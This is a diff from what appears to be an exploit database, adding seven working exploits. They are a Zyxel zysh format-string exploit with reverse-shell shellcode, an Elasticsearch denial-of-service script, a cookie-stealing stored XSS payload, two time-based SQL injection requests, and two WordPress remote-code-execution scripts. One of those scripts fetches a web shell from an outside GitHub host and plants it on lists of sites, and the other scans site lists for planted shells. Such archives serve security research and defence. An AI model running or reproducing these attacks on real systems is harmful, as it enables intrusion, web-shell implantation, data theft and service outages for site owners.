DB: 2024-02-10

8 changes to exploits/shellcodes/ghdb

Zyxel zysh - Format string

Elasticsearch - StackOverflow DoS

Advanced Page Visit Counter 1.0 - Admin+ Stored Cross-Site Scripting (XSS) (Authenticated)

Online Nurse Hiring System 1.0 - Time-Based SQL Injection

Rail Pass Management System 1.0 - Time-Based SQL Injection

Wordpress Augmented-Reality - Remote Code Execution Unauthenticated

Wordpress Seotheme - Remote Code Execution Unauthenticated

exploits/hardware/remote/51786.txt

@@ -0,0 +1,207 @@
+#!/usr/bin/expect -f
+
+#
+# raptor_zysh_fhtagn.exp - zysh format string PoC exploit
+# Copyright (c) 2022 Marco Ivaldi <raptor@0xdeadbeef.info>
+#
+# "We live on a placid island of ignorance in the midst of black seas of
+# infinity, and it was not meant that we should voyage far."
+#                                -- H. P. Lovecraft, The Call of Cthulhu
+#
+# "Multiple improper input validation flaws were identified in some CLI
+# commands of Zyxel USG/ZyWALL series firmware versions 4.09 through 4.71,
+# USG FLEX series firmware versions 4.50 through 5.21, ATP series firmware
+# versions 4.32 through 5.21, VPN series firmware versions 4.30 through
+# 5.21, NSG series firmware versions 1.00 through 1.33 Patch 4, NXC2500
+# firmware version 6.10(AAIG.3) and earlier versions, NAP203 firmware
+# version 6.25(ABFA.7) and earlier versions, NWA50AX firmware version
+# 6.25(ABYW.5) and earlier versions, WAC500 firmware version 6.30(ABVS.2)
+# and earlier versions, and WAX510D firmware version 6.30(ABTF.2) and
+# earlier versions, that could allow a local authenticated attacker to
+# cause a buffer overflow or a system crash via a crafted payload."
+#                                -- CVE-2022-26531
+#
+# The zysh binary is a restricted shell that implements the command-line
+# interface (CLI) on multiple Zyxel products. This proof-of-concept exploit
+# demonstrates how to leverage the format string bugs I have identified in
+# the "extension" argument of some zysh commands, to execute arbitrary code
+# and escape the restricted shell environment.
+#
+# - This exploit targets the "ping" zysh command.
+# - It overwrites the .got entry of fork() with the shellcode address.
+# - The shellcode address is calculated based on a leaked stack address.
+# - Hardcoded offsets and values might need some tweaking, see comments.
+# - Automation/weaponization for other targets is left as an exercise.
+#
+# For additional details on my bug hunting journey and on the
+# vulnerabilities themselves, you can refer to the official advisory:
+# https://github.com/0xdea/advisories/blob/master/HNS-2022-02-zyxel-zysh.txt
+#
+# Usage:
+# raptor@blumenkraft ~ % ./raptor_zysh_fhtagn.exp <REDACTED> admin password
+# raptor_zysh_fhtagn.exp - zysh format string PoC exploit
+# Copyright (c) 2022 Marco Ivaldi <raptor@0xdeadbeef.info>
+#
+# Leaked stack address:  0x7fe97170
+# Shellcode address:     0x7fe9de40
+# Base string length:    46
+# Hostile format string: %.18u%1801$n%.169u%1801$hn%.150u%1801$hhn%.95u%1802$hhn
+#
+# *** enjoy your shell! ***
+#
+# sh-5.1$ uname -snrmp
+# Linux USG20-VPN 3.10.87-rt80-Cavium-Octeon mips64 Cavium Octeon III V0.2 FPU V0.0
+# sh-5.1$ id
+# uid=10007(admin) gid=10000(operator) groups=10000(operator)
+#
+# Tested on:
+# Zyxel USG20-VPN with Firmware 5.10
+# [other appliances/versions are also likely vulnerable]
+#
+
+# change string encoding to 8-bit ASCII to avoid annoying conversion to UTF-8
+encoding system iso8859-1
+
+# hostile format string to leak stack address via direct parameter access
+set offset1 77
+set leak [format "AAAA.0x%%%d\$x" $offset1]
+
+# offsets to reach addresses in retloc sled via direct parameter access
+set offset2 1801
+set offset3 [expr $offset2 + 1]
+
+# difference between leaked stack address and shellcode address
+set diff 27856
+
+# retloc sled
+# $ mips64-linux-readelf -a zysh | grep JUMP | grep fork
+# 112dd558  0000967f R_MIPS_JUMP_SLOT  00000000   fork@GLIBC_2.0
+# ^^^^^^^^ << this is the address we need to encode: [112dd558][112dd558][112dd558+2][112dd558+2]
+set retloc [string repeat "\x11\x2d\xd5\x58\x11\x2d\xd5\x58\x11\x2d\xd5\x5a\x11\x2d\xd5\x5a" 1024]
+
+# nop sled
+# nop-equivalent instruction: xor $t0, $t0, $t0
+set nops [string repeat "\x01\x8c\x60\x26" 64]
+
+# shellcode
+# https://github.com/0xdea/shellcode/blob/main/MIPS/mips_n32_msb_linux_revsh.c
+set sc "\x3c\x0c\x2f\x62\x25\x8c\x69\x6e\xaf\xac\xff\xec\x3c\x0c\x2f\x73\x25\x8c\x68\x68\xaf\xac\xff\xf0\xa3\xa0\xff\xf3\x27\xa4\xff\xec\xaf\xa4\xff\xf8\xaf\xa0\xff\xfc\x27\xa5\xff\xf8\x28\x06\xff\xff\x24\x02\x17\xa9\x01\x01\x01\x0c"
+
+# padding to align payload in memory (might need adjusting)
+set padding "AAA"
+
+# print header
+send_user "raptor_zysh_fhtagn.exp - zysh format string PoC exploit\n"
+send_user "Copyright (c) 2022 Marco Ivaldi <raptor@0xdeadbeef.info>\n\n"
+
+# check command line
+if { [llength $argv] != 3} {
+	send_error "usage: ./raptor_zysh_fhtagn.exp <host> <user> <pass>\n"
+	exit 1
+}
+
+# get SSH connection parameters
+set port "22"
+set host [lindex $argv 0]
+set user [lindex $argv 1]
+set pass [lindex $argv 2]
+
+# inject payload via the TERM environment variable
+set env(TERM) $retloc$nops$sc$padding
+
+# connect to target via SSH
+log_user 0
+spawn -noecho ssh -q -o StrictHostKeyChecking=no -p $port $host -l $user
+expect {
+	-nocase "password*" {
+		send "$pass\r"
+	}
+	default {
+		send_error "error: could not connect to ssh\n"
+		exit 1
+	}
+}
+
+# leak stack address
+expect {
+	"Router? $" {
+		send "ping 127.0.0.1 extension $leak\r"
+	}
+	default {
+		send_error "error: could not access zysh prompt\n"
+		exit 1
+	}
+}
+expect {
+	-re "ping: unknown host AAAA\.(0x.*)\r\n" {
+	}
+	default {
+		send_error "error: could not leak stack address\n"
+		exit 1
+	}
+}
+set leaked $expect_out(1,string)
+send_user "Leaked stack address:\t$leaked\n"
+
+# calculate shellcode address
+set retval [expr $leaked + $diff]
+set retval [format 0x%x $retval]
+send_user "Shellcode address:\t$retval\n"
+
+# extract each byte of shellcode address
+set b1 [expr ($retval & 0xff000000) >> 24]
+set b2 [expr ($retval & 0x00ff0000) >> 16]
+set b3 [expr ($retval & 0x0000ff00) >> 8]
+set b4 [expr ($retval & 0x000000ff)]
+set b1 [format 0x%x $b1]
+set b2 [format 0x%x $b2]
+set b3 [format 0x%x $b3]
+set b4 [format 0x%x $b4]
+
+# calculate numeric arguments for the hostile format string
+set base [string length "/bin/zysudo.suid /bin/ping 127.0.0.1 -n -c 3  "]
+send_user "Base string length:\t$base\n"
+set n1 [expr ($b4 - $base) % 0x100]
+set n2 [expr ($b2 - $b4) % 0x100]
+set n3 [expr ($b1 - $b2) % 0x100]
+set n4 [expr ($b3 - $b1) % 0x100]
+
+# check for dangerous numeric arguments below 10
+if {$n1 < 10} { incr n1 0x100 }
+if {$n2 < 10} { incr n2 0x100 }
+if {$n3 < 10} { incr n3 0x100 }
+if {$n4 < 10} { incr n4 0x100 }
+
+# craft the hostile format string
+set exploit [format "%%.%du%%$offset2\$n%%.%du%%$offset2\$hn%%.%du%%$offset2\$hhn%%.%du%%$offset3\$hhn" $n1 $n2 $n3 $n4]
+send_user "Hostile format string:\t$exploit\n\n"
+
+# uncomment to debug
+# interact +
+
+# exploit target
+set prompt "(#|\\\$) $"
+expect {
+	"Router? $" {
+		send "ping 127.0.0.1 extension $exploit\r"
+	}
+	default {
+		send_error "error: could not access zysh prompt\n"
+		exit 1
+	}
+}
+expect {
+	"Router? $" {
+		send_error "error: could not exploit target\n"
+		exit 1
+	}
+	-re $prompt {
+		send_user "*** enjoy your shell! ***\n"
+		send "\r"
+		interact
+	}
+	default {
+		send_error "error: could not exploit target\n"
+		exit 1
+	}
+}

exploits/multiple/dos/51787.txt

@@ -0,0 +1,54 @@
+# Exploit Author: TOUHAMI KASBAOUI
+# Vendor Homepage: https://elastic.co/
+# Version: 8.5.3 / OpenSearch
+# Tested on: Ubuntu 20.04 LTS
+# CVE : CVE-2023-31419
+# Ref: https://github.com/sqrtZeroKnowledge/Elasticsearch-Exploit-CVE-2023-31419
+
+import requests
+import random
+import string
+
+es_url = 'http://localhost:9200'  # Replace with your Elasticsearch server URL
+index_name = '*'
+
+payload = "/*" * 10000 + "\\" +"'" * 999
+
+verify_ssl = False
+
+username = 'elastic'
+password = 'changeme'
+
+auth = (username, password)
+
+num_queries = 100
+
+for _ in range(num_queries):
+    symbols = ''.join(random.choice(string.ascii_letters + string.digits + '^') for _ in range(5000))
+    search_query = {
+        "query": {
+            "match": {
+                "message": (symbols * 9000) + payload
+            }
+        }
+    }
+
+    print(f"Query {_ + 1} - Search Query:")
+
+    search_endpoint = f'{es_url}/{index_name}/_search'
+    response = requests.get(search_endpoint, json=search_query, verify=verify_ssl, auth=auth)
+
+    if response.status_code == 200:
+        search_results = response.json()
+
+        print(f"Query {_ + 1} - Response:")
+        print(search_results)
+
+        total_hits = search_results['hits']['total']['value']
+        print(f"Query {_ + 1}: Total hits: {total_hits}")
+
+        for hit in search_results['hits']['hits']:
+            source_data = hit['_source']
+            print("Payload result: {search_results}")
+    else:
+        print(f"Error for query {_ + 1}: {response.status_code} - {response.text}")

exploits/php/webapps/51785.txt

@@ -0,0 +1,52 @@
+# Exploit Title: Advanced Page Visit Counter 1.0 - Admin+ Stored Cross-Site
+Scripting (XSS) (Authenticated)
+# Date: 11.10.2023
+# Exploit Author: Furkan ÖZER
+# Software Link: https://wordpress.org/plugins/advanced-page-visit-counter/
+# Version: 8.0.5
+# Tested on: Kali-Linux,Windows10,Windows 11
+# CVE: N/A
+
+
+# Description:
+Advanced Page Visit Counter is a remarkable Google Analytics alternative
+specifically designed for WordPress websites, and it has quickly become a
+must-have plugin for website owners and administrators seeking powerful
+tracking and analytical capabilities. With the recent addition of Enhanced
+eCommerce Tracking for WooCommerce, this plugin has become even more
+indispensable for online store owners.
+
+Homepage | Support | Premium Version
+
+If you’re in search of a GDPR-friendly website analytics plugin exclusively
+designed for WordPress, look no further than Advanced Page Visit Counter.
+This exceptional plugin offers a compelling alternative to Google Analytics
+and is definitely worth a try for those seeking enhanced data privacy
+compliance.
+
+This is a free plugin and doesn’t require you to create an account on
+another site. All features outlined below are included in the free plugin.
+
+Description of the owner of the plugin Stored Cross-Site Scripting attack
+against the administrators or the other authenticated users.
+
+The plugin does not sanitise and escape some of its settings, which could
+allow high privilege users such as admin to perform Stored Cross-Site
+Scripting attacks even when the unfiltered_html capability is disallowed
+(for example in multisite setup)
+
+The details of the discovery are given below.
+
+# Steps To Reproduce:
+1. Install and activate the Advanced Page Visit Counter plugin.
+2. Visit the "Settings" interface available in settings page of the plugin
+that is named "Widget Settings"
+3. In the plugin's "Today's Count Label" setting field, enter the payload
+Payload: " "type=image src=1 onerror=alert(document.cookie)> "
+6. Click the "Save Changes" button.
+7. The XSS will be triggered on the settings page when every visit of an
+authenticated user.
+
+
+# Video Link
+https://youtu.be/zcfciGZLriM

exploits/php/webapps/51788.py

@@ -0,0 +1,92 @@
+# Exploit Title: Wordpress Augmented-Reality - Remote Code Execution Unauthenticated
+# Date: 2023-09-20
+# Author: Milad Karimi (Ex3ptionaL)
+# Category : webapps
+# Tested on: windows 10 , firefox
+
+import requests as req
+import json
+import sys
+import random
+import uuid
+import urllib.parse
+import urllib3
+from multiprocessing.dummy import Pool as ThreadPool
+urllib3.disable_warnings(urllib3.exceptions.InsecureRequestWarning)
+filename="{}.php".format(str(uuid.uuid4())[:8])
+proxies = {}
+#proxies = {
+#  'http': 'http://127.0.0.1:8080',
+#  'https': 'http://127.0.0.1:8080',
+#}
+phash = "l1_Lw"
+r=req.Session()
+user_agent={
+"User-Agent":"Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/44.0.2403.157 Safari/537.36"
+}
+r.headers.update(user_agent)
+def is_json(myjson):
+  try:
+    json_object = json.loads(myjson)
+  except ValueError as e:
+    return False
+  return True
+def mkfile(target):
+    data={"cmd" : "mkfile", "target":phash, "name":filename}
+    resp=r.post(target, data=data)
+    respon = resp.text
+    if resp.status_code == 200 and is_json(respon):
+        resp_json=respon.replace(r"\/", "").replace("\\", "")
+        resp_json=json.loads(resp_json)
+        return resp_json["added"][0]["hash"]
+    else:
+        return False
+def put(target, hash):
+    content=req.get("https://raw.githubusercontent.com/0x5a455553/MARIJUANA/master/MARIJUANA.php", proxies=proxies, verify=False)
+    content=content.text
+    data={"cmd" : "put", "target":hash, "content": content}
+    respon=r.post(target, data=data, proxies=proxies, verify=False)
+    if respon.status_code == 200:
+      return True
+def exploit(target):
+    try:
+        vuln_path = "{}/wp-content/plugins/augmented-reality/vendor/elfinder/php/connector.minimal.php".format(target)
+        respon=r.get(vuln_path, proxies=proxies, verify=False).status_code
+        if respon != 200:
+          print("[FAIL] {}".format(target))
+          return
+        hash=mkfile(vuln_path)
+        if hash == False:
+          print("[FAIL] {}".format(target))
+          return
+        if put(vuln_path, hash):
+          shell_path = "{}/wp-content/plugins/augmented-reality/file_manager/{}".format(target,filename)
+          status = r.get(shell_path, proxies=proxies, verify=False).status_code
+          if status==200 :
+              with open("result.txt", "a") as newline:
+                  newline.write("{}\n".format(shell_path))
+                  newline.close()
+              print("[OK] {}".format(shell_path))
+              return
+          else:
+              print("[FAIL] {}".format(target))
+              return
+        else:
+          print("[FAIL] {}".format(target))
+          return
+    except req.exceptions.SSLError:
+          print("[FAIL] {}".format(target))
+          return
+    except req.exceptions.ConnectionError:
+          print("[FAIL] {}".format(target))
+          return
+def main():
+    threads = input("[?] Threads > ")
+    list_file = input("[?] List websites file > ")
+    print("[!] all result saved in result.txt")
+    with open(list_file, "r") as file:
+        lines = [line.rstrip() for line in file]
+        th = ThreadPool(int(threads))
+        th.map(exploit, lines)
+if __name__ == "__main__":
+    main()

exploits/php/webapps/51789.py

@@ -0,0 +1,85 @@
+# Exploit Title: Wordpress Seotheme - Remote Code Execution Unauthenticated
+# Date: 2023-09-20
+# Author: Milad Karimi (Ex3ptionaL)
+# Category : webapps
+# Tested on: windows 10 , firefox
+
+import sys , requests, re
+from multiprocessing.dummy import Pool
+from colorama import Fore
+from colorama import init
+init(autoreset=True)
+
+fr  =   Fore.RED
+fc  =   Fore.CYAN
+fw  =   Fore.WHITE
+fg  =   Fore.GREEN
+fm  =   Fore.MAGENTA
+
+shell = """<?php echo "EX"; echo "<br>".php_uname()."<br>"; echo "<form method='post' enctype='multipart/form-data'> <input type='file' name='zb'><input type='submit' name='upload' value='upload'></form>"; if($_POST['upload']) { if(@copy($_FILES['zb']['tmp_name'], $_FILES['zb']['name'])) { echo "eXploiting Done"; } else { echo "Failed to Upload."; } } ?>"""
+requests.urllib3.disable_warnings()
+headers = {'Connection': 'keep-alive',
+            'Cache-Control': 'max-age=0',
+            'Upgrade-Insecure-Requests': '1',
+            'User-Agent': 'Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36',
+            'Accept': 'text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8',
+            'Accept-Encoding': 'gzip, deflate',
+            'Accept-Language': 'en-US,en;q=0.9,fr;q=0.8',
+            'referer': 'www.google.com'}
+try:
+    target = [i.strip() for i in open(sys.argv[1], mode='r').readlines()]
+except IndexError:
+    path = str(sys.argv[0]).split('\\')
+    exit('\n  [!] Enter <' + path[len(path) - 1] + '> <sites.txt>')
+
+def URLdomain(site):
+    if site.startswith("http://") :
+        site = site.replace("http://","")
+    elif site.startswith("https://") :
+        site = site.replace("https://","")
+    else :
+        pass
+    pattern = re.compile('(.*)/')
+    while re.findall(pattern,site):
+        sitez = re.findall(pattern,site)
+        site = sitez[0]
+    return site
+
+
+def FourHundredThree(url):
+    try:
+        url = 'http://' + URLdomain(url)
+        check = requests.get(url+'/wp-content/plugins/seoplugins/mar.php',headers=headers, allow_redirects=True,timeout=15)
+        if '//0x5a455553.github.io/MARIJUANA/icon.png' in check.content:
+                print ' -| ' + url + ' --> {}[Succefully]'.format(fg)
+                open('seoplugins-Shells.txt', 'a').write(url + '/wp-content/plugins/seoplugins/mar.php\n')
+        else:
+            url = 'https://' + URLdomain(url)
+            check = requests.get(url+'/wp-content/plugins/seoplugins/mar.php',headers=headers, allow_redirects=True,verify=False ,timeout=15)
+            if '//0x5a455553.github.io/MARIJUANA/icon.png' in check.content:
+                    print ' -| ' + url + ' --> {}[Succefully]'.format(fg)
+                    open('seoplugins-Shells.txt', 'a').write(url + '/wp-content/plugins/seoplugins/mar.php\n')
+            else:
+                print ' -| ' + url + ' --> {}[Failed]'.format(fr)
+                url = 'http://' + URLdomain(url)
+        check = requests.get(url+'/wp-content/themes/seotheme/mar.php',headers=headers, allow_redirects=True,timeout=15)
+        if '//0x5a455553.github.io/MARIJUANA/icon.png' in check.content:
+                print ' -| ' + url + ' --> {}[Succefully]'.format(fg)
+                open('seotheme-Shells.txt', 'a').write(url + '/wp-content/themes/seotheme/mar.php\n')
+        else:
+            url = 'https://' + URLdomain(url)
+            check = requests.get(url+'/wp-content/themes/seotheme/mar.php',headers=headers, allow_redirects=True,verify=False ,timeout=15)
+            if '//0x5a455553.github.io/MARIJUANA/icon.png' in check.content:
+                    print ' -| ' + url + ' --> {}[Succefully]'.format(fg)
+                    open('seotheme-Shells.txt', 'a').write(url + '/wp-content/themes/seotheme/mar.php\n')
+            else:
+                print ' -| ' + url + ' --> {}[Failed]'.format(fr)
+    except :
+        print ' -| ' + url + ' --> {}[Failed]'.format(fr)
+
+mp = Pool(100)
+mp.map(FourHundredThree, target)
+mp.close()
+mp.join()
+
+print '\n [!] {}Saved in Shells.txt'.format(fc)

exploits/php/webapps/51790.txt

@@ -0,0 +1,29 @@
+# Exploit Title: Rail Pass Management System - 'searchdata' Time-Based SQL Injection
+# Date: 02/10/2023
+# Exploit Author: Alperen Yozgat
+# Vendor Homepage: https://phpgurukul.com/rail-pass-management-system-using-php-and-mysql/
+# Software Link: https://phpgurukul.com/?sdm_process_download=1&download_id=17479
+# Version: 1.0
+# Tested On: Kali Linux 6.1.27-1kali1 (2023-05-12) x86_64 + XAMPP 7.4.30
+
+## Description ##
+
+On the download-pass.php page, the searchdata parameter in the search function is vulnerable to SQL injection vulnerability.
+
+## Proof of Concept ##
+
+# After sending the payload, the response time will increase to at least 5 seconds.
+# Payload: 1'or+sleep(5)--+-
+
+POST /rpms/download-pass.php HTTP/1.1
+Host: localhost
+User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:102.0) Gecko/20100101 Firefox/102.0
+Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
+Accept-Language: en-US,en;q=0.5
+Accept-Encoding: gzip, deflate
+Content-Type: application/x-www-form-urlencoded
+Content-Length: 36
+Cookie: PHPSESSID=6028f950766b973640e0ff64485f727b
+
+
+searchdata=1'or+sleep(5)--+-&search=

exploits/php/webapps/51791.txt

@@ -0,0 +1,28 @@
+# Exploit Title: Online Nurse Hiring System 1.0 - 'bookid' Time-Based SQL Injection
+# Date: 03/10/2023
+# Exploit Author: Alperen Yozgat
+# Vendor Homepage: https://phpgurukul.com/online-nurse-hiring-system-using-php-and-mysql
+# Software Link: https://phpgurukul.com/?sdm_process_download=1&download_id=17826
+# Version: 1.0
+# Tested On: Kali Linux 6.1.27-1kali1 (2023-05-12) x86_64 + XAMPP 7.4.30
+
+## Description ##
+
+On the book-nurse.php page, the bookid parameter is vulnerable to SQL Injection vulnerability.
+
+## Proof of Concept ##
+
+# After sending the payload, the response time will increase to at least 5 seconds.
+# Payload: 1'+AND+(SELECT+2667+FROM+(SELECT(SLEEP(5)))RHGJ)+AND+'vljY'%3d'vljY
+
+POST /onhs/book-nurse.php?bookid=1'+AND+(SELECT+2667+FROM+(SELECT(SLEEP(5)))RHGJ)+AND+'vljY'%3d'vljY HTTP/1.1
+Host: localhost
+User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:102.0) Gecko/20100101 Firefox/102.0
+Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
+Accept-Language: en-US,en;q=0.5
+Accept-Encoding: gzip, deflate
+Content-Type: application/x-www-form-urlencoded
+Content-Length: 140
+Cookie: PHPSESSID=0ab508c4aa5fdb6c55abb909e5cbce09
+
+contactname=test&contphonenum=1111111&contemail=test%40test.com&fromdate=2023-10-11&todate=2023-10-18&timeduration=1&patientdesc=3&submit=

files_exploits.csv

@@ -4006,6 +4006,7 @@ id,file,description,date_published,author,type,platform,port,date_added,date_upd
 43105,exploits/hardware/remote/43105.txt,"ZyXEL PK5001Z Modem - Backdoor Account",2017-10-31,"Matthew Sheimo",remote,hardware,,2017-11-01,2017-11-01,0,CVE-2016-10401,,,,,
 21186,exploits/hardware/remote/21186.txt,"ZYXEL Prestige 681 SDSL Router - IP Fragment Reassembly",2001-12-18,"Przemyslaw Frasunek",remote,hardware,,2001-12-18,2012-09-09,1,CVE-2001-1194;OSVDB-9979,,,,,https://www.securityfocus.com/bid/3711/info
 50946,exploits/hardware/remote/50946.txt,"Zyxel USG FLEX 5.21 - OS Command Injection",2022-06-03,"Valentin Lobstein",remote,hardware,,2022-06-03,2022-06-03,0,CVE-2022-30525,,,,,
+51786,exploits/hardware/remote/51786.txt,"Zyxel zysh - Format string",2024-02-09,"Marco Ivaldi",remote,hardware,,2024-02-09,2024-02-09,0,,,,,,
 23527,exploits/hardware/remote/23527.txt,"ZYXEL ZyWALL 10 Management Interface - Cross-Site Scripting",2004-01-06,"Rafel Ivgi",remote,hardware,,2004-01-06,2012-12-20,1,CVE-2004-1789;OSVDB-3443,,,,,https://www.securityfocus.com/bid/9373/info
 30485,exploits/hardware/remote/30485.html,"ZYXEL ZyWALL 2 3.62 - '/Forms/General_1?sysSystemName' Cross-Site Scripting",2007-08-10,"Henri Lindberg",remote,hardware,,2007-08-10,2013-12-25,1,CVE-2007-4318;OSVDB-38721,,,,,https://www.securityfocus.com/bid/25262/info
 5289,exploits/hardware/remote/5289.txt,"ZYXEL ZyWALL Quagga/Zebra - 'Default Password' Remote Code Execution",2008-03-21,"Pranav Joshi",remote,hardware,,2008-03-20,2016-12-05,1,OSVDB-43700;CVE-2008-1160,,,,,
@@ -9538,6 +9539,7 @@ id,file,description,date_published,author,type,platform,port,date_added,date_upd
 34248,exploits/multiple/dos/34248.txt,"EDItran Communications Platform (editcp) 4.1 - Remote Buffer Overflow",2010-07-05,"Pedro Andujar",dos,multiple,,2010-07-05,2014-08-03,1,,,,,,https://www.securityfocus.com/bid/41342/info
 23390,exploits/multiple/dos/23390.txt,"EffectOffice Server 2.6 - Remote Service Buffer Overflow (PoC)",2003-11-20,D_BuG,dos,multiple,,2003-11-20,2012-12-14,1,OSVDB-2848,,,,,https://www.securityfocus.com/bid/9077/info
 8695,exploits/multiple/dos/8695.txt,"Eggdrop/Windrop 1.6.19 - ctcpbuf Remote Crash",2009-05-15,"Thomas Sader",dos,multiple,,2009-05-14,,1,OSVDB-54460;CVE-2009-1789,,,,,http://secunia.com/advisories/25276
+51787,exploits/multiple/dos/51787.txt,"Elasticsearch - StackOverflow DoS",2024-02-09,"TOUHAMI Kasbaoui",dos,multiple,,2024-02-09,2024-02-09,0,,,,,,
 11763,exploits/multiple/dos/11763.pl,"Embedthis Appweb 3.1.2 - Remote Denial of Service",2010-03-15,chr1x,dos,multiple,,2010-03-14,,0,OSVDB-62969,,,,,
 18601,exploits/multiple/dos/18601.txt,"EMC NetWorker 7.6 sp3 - Denial of Service",2012-03-14,"Luigi Auriemma",dos,multiple,,2012-03-14,2012-03-14,1,OSVDB-80590,,,,,
 27420,exploits/multiple/dos/27420.c,"ENet - Multiple Denial of Service Vulnerabilities",2006-03-13,"Luigi Auriemma",dos,multiple,,2006-03-13,2013-08-07,1,CVE-2006-1194;OSVDB-23844,,,,,https://www.securityfocus.com/bid/17087/info
@@ -13583,6 +13585,7 @@ id,file,description,date_published,author,type,platform,port,date_added,date_upd
 12038,exploits/php/webapps/12038.txt,"Advanced Management For Services Sites - Bypass Create And Download SQL Backup",2010-04-04,indoushka,webapps,php,,2010-04-03,,1,,,,,,
 12031,exploits/php/webapps/12031.html,"Advanced Management For Services Sites - Remote Add Admin",2010-04-03,alnjm33,webapps,php,,2010-04-02,,0,,,,,http://www.exploit-db.comam4ss.zip,
 41521,exploits/php/webapps/41521.txt,"Advanced Matrimonial Script 2.0.3 - SQL Injection",2017-03-06,"Ihsan Sencan",webapps,php,,2017-03-06,2017-03-06,0,,,,,,
+51785,exploits/php/webapps/51785.txt,"Advanced Page Visit Counter 1.0 - Admin+ Stored Cross-Site Scripting (XSS) (Authenticated)",2024-02-09,"Furkan ÖZER",webapps,php,,2024-02-09,2024-02-09,0,,,,,,
 33972,exploits/php/webapps/33972.txt,"Advanced Poll 2.0 - 'mysql_host' Cross-Site Scripting",2010-05-10,"High-Tech Bridge SA",webapps,php,,2010-05-10,2014-07-05,1,CVE-2010-2003;OSVDB-64524,,,,,https://www.securityfocus.com/bid/40045/info
 22412,exploits/php/webapps/22412.txt,"Advanced Poll 2.0 - Remote Information Disclosure",2003-03-22,subj,webapps,php,,2003-03-22,2012-11-02,1,CVE-2003-1181;OSVDB-3292,,,,,https://www.securityfocus.com/bid/7171/info
 28253,exploits/php/webapps/28253.txt,"Advanced Poll 2.0.2 - 'common.inc.php' Remote File Inclusion",2006-07-21,Solpot,webapps,php,,2006-07-21,2013-09-13,1,CVE-2003-1179;OSVDB-28988,,,,,https://www.securityfocus.com/bid/19105/info
@@ -24857,6 +24860,7 @@ id,file,description,date_published,author,type,platform,port,date_added,date_upd
 49421,exploits/php/webapps/49421.txt,"Online Movie Streaming 1.0 - Admin Authentication Bypass",2021-01-14,"Richard Jones",webapps,php,,2021-01-14,2021-01-14,0,,,,,,
 49688,exploits/php/webapps/49688.txt,"Online News Portal 1.0 - 'Multiple' Stored Cross-Site Scripting",2021-03-19,"Richard Jones",webapps,php,,2021-03-19,2021-03-19,0,,,,,,
 49687,exploits/php/webapps/49687.txt,"Online News Portal 1.0 - 'name' SQL Injection",2021-03-19,"Richard Jones",webapps,php,,2021-03-19,2021-03-19,0,,,,,,
+51791,exploits/php/webapps/51791.txt,"Online Nurse Hiring System 1.0 - Time-Based SQL Injection",2024-02-09,yozgatalperen1,webapps,php,,2024-02-09,2024-02-09,0,,,,,,
 49615,exploits/php/webapps/49615.txt,"Online Ordering System 1.0 - Arbitrary File Upload",2021-03-04,"Suraj Bhosale",webapps,php,,2021-03-04,2021-11-01,0,,,,,,
 49618,exploits/php/webapps/49618.txt,"Online Ordering System 1.0 - Blind SQL Injection (Unauthenticated)",2021-03-04,"Suraj Bhosale",webapps,php,,2021-03-04,2021-03-04,0,,,,,,
 8450,exploits/php/webapps/8450.txt,"Online Password Manager 4.1 - Insecure Cookie Handling",2009-04-16,ZoRLu,webapps,php,,2009-04-15,,1,OSVDB-53775,,,,,
@@ -28614,6 +28618,7 @@ id,file,description,date_published,author,type,platform,port,date_added,date_upd
 28048,exploits/php/webapps/28048.txt,"RahnemaCo - 'page.php' PageID Remote File Inclusion",2006-06-17,CrAzY.CrAcKeR,webapps,php,,2006-06-17,2013-09-03,1,CVE-2006-3314;OSVDB-27509,,,,,https://www.securityfocus.com/bid/18490/info
 28025,exploits/php/webapps/28025.txt,"RahnemaCo - 'page.php' Remote File Inclusion",2006-06-14,Breeeeh,webapps,php,,2006-06-14,2013-09-02,1,CVE-2006-3315;OSVDB-27503,,,,,https://www.securityfocus.com/bid/18435/info
 34400,exploits/php/webapps/34400.txt,"RaidenTunes - 'music_out.php' Cross-Site Scripting",2014-08-03,LiquidWorm,webapps,php,,2014-08-03,2014-08-24,1,,,,,,https://www.securityfocus.com/bid/42167/info
+51790,exploits/php/webapps/51790.txt,"Rail Pass Management System 1.0 - Time-Based SQL Injection",2024-02-09,yozgatalperen1,webapps,php,,2024-02-09,2024-02-09,0,,,,,,
 34996,exploits/php/webapps/34996.txt,"Raised Eyebrow CMS - 'venue.php' SQL Injection",2010-11-16,Cru3l.b0y,webapps,php,,2010-11-16,2014-10-17,1,,,,,,https://www.securityfocus.com/bid/44880/info
 16094,exploits/php/webapps/16094.txt,"Raja Natarajan Guestbook 1.0 - Local File Inclusion",2011-02-02,h0rd,webapps,php,,2011-02-02,2011-02-03,1,,,,http://www.exploit-db.com/screenshots/idlt16500/16094.png,http://www.exploit-db.comguestbook_1.0.zip,
 32607,exploits/php/webapps/32607.txt,"RakhiSoftware Shopping Cart - 'product.php' Multiple Cross-Site Scripting Vulnerabilities",2008-11-28,"Charalambous Glafkos",webapps,php,,2008-11-28,2014-03-31,1,CVE-2008-6278;OSVDB-50326,,,,,https://www.securityfocus.com/bid/32563/info
@@ -32588,6 +32593,7 @@ id,file,description,date_published,author,type,platform,port,date_added,date_upd
 50304,exploits/php/webapps/50304.sh,"WordPress 5.7 - 'Media Library' XML External Entity Injection (XXE) (Authenticated)",2021-09-20,"David Utón",webapps,php,,2021-09-20,2021-09-20,0,CVE-2021-29447,,,,,
 51663,exploits/php/webapps/51663.txt,"WordPress adivaha Travel Plugin 2.3 - Reflected XSS",2023-08-04,CraCkEr,webapps,php,,2023-08-04,2023-08-04,0,,,,,,
 51655,exploits/php/webapps/51655.txt,"WordPress adivaha Travel Plugin 2.3 - SQL Injection",2023-08-04,CraCkEr,webapps,php,,2023-08-04,2023-08-04,0,,,,,,
+51788,exploits/php/webapps/51788.py,"Wordpress Augmented-Reality - Remote Code Execution Unauthenticated",2024-02-09,"Milad karimi",webapps,php,,2024-02-09,2024-02-09,0,,,,,,
